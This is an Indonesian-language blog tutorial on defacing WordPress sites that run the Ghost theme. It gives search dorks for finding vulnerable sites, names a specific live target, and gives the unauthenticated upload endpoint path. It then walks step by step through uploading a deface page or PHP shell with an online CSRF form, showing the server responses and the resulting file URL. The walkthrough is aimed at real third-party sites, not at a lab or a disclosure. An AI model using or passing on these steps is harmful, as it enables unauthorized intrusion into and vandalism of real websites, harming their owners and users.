Pemblokir Iklan Terdeteksi

Matikan adBlock anda untuk dapat mengakses situs ini.

translate to english
LOADING...
Website Masih Dalam Proses Pengembangan. Download Template Jika Anda Berminat.
Download

Cara Deface PoC Wp-Ghost Themes With Csrf

4 min read
Cara deface poc wp-ghost themes with csrf
Cara deface poc wp-ghost themes with csrf

Cara Deface PoC Wp-Ghost Themes With Csrf

Assalamualaikum, halo pengunjung selamat datang di blog Shadow Secure System, pada halaman kali ini saya akan membahas Cara Deface PoC Wp-Ghost Themes With Csrf.

Bahan-bahan:
Dork:
inurl:wp-content/themes/Ghost/
inurl:wp-content/themes/Ghost/includes/
inurl:wp-content/themes/Ghost/includes/uploadify/
inurl:wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

( Kembangin lagi biar dapet yang fress )

Live target:
https://www.simseklerdugunsarayi.com/
Exploit:
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Mencari target

Pertama kalian mencari target terlebih dahulu, karena saya sudah mempunyai live target jadi langsung saja kita menambahkan exploit.

Menambahkan exploit

Menambahkan exploit
Menambahkan exploit

Lalu lanjut menambahkan Exploit pada akhiran target contoh seperti ini:
https://www.simseklerdugunsarayi.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Status response

Status response
Status response

Jika sudah memasukan exploit maka kalian akan mendapatkan status response seperti ini:
{"status":"NOK", "ERR":"This file is incorect"}

Csrf online

Csrf online
Csrf online

Setelah kalian mendapatkan status response seperti itu, lanjut kalian pergi ke csrf online cari aja digoogle banyak pada bagian target kalian masukan url target berserta exploitnya lalu dibagian post file kalian ketikan Filedata Lalu kalian lock target setelah terlock targetnya kalian upload file deface atau shell ( jika support php ) disini saya mengupload script deface, setelah memilih script deface kalian klik tombol upload.

Response upload

Response upload
Response upload

Jika kalian sudah mengklik tombol upload maka kalian akan mendapatkan response upload seperti ini:
{"status":"OK","imageID":"stronghtml","imageName":"strong.html","html":"\n\t\n\t\t html File<\/div><\/td>\n\t\tstrong.html \n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}

Akses file

Akses file
Akses file

Jika file kalian berhasil terupload sekarang saatnya kalian akses file yang tadi berhasil terupload, kalian akses filenya seperti ini:
https://www.simseklerdugunsarayi.com/wp-content/uploads/settingsimages/nama file.html

Setelah diakses

Setelah diakses
Setelah diakses

Oke script deface kita sudah terupload mudah bukan? Jika masih belum paham silahkan simak video dibawah.


Sekian Cara Deface PoC Wp-Ghost Themes With Csrf pada halaman ini, jika ada kesalahan ataupun kekurangan pada halaman ini saya pribadi mohon maaf, Wassalamualaikum

Help!
Baca juga :
Semangat berkarya mekipun hasil copy paste!

Blogger : Cerdasin62+

Mau donasi keh?

Paypal
Dana - 0887435373103
Jika dana kalian terlalu banyak bisa beri admin sedikit banyak dana sesuka hati. klik icon panah di atas

قد تُعجبك هذه المشاركات

Apakah artikel ini bermanfaat? Silahkan klik bintang di bawah.
Jangan lupa beri komentar.
Komentar.

إرسال تعليق

Tinggalkan komentar sesuai topik tulisan, centang Notify me untuk mendapatkan notifikasi via email ketika komentar kamu di balas.
Masukkan URL Gambar atau Potongan Kode, atau Quote, lalu klik tombol yang kamu inginkan untuk di-parse. Salin hasil parse lalu paste ke kolom komentar.


image quote pre code
CaraTech.

Mampir Juga Ke Blogger caratech.my.id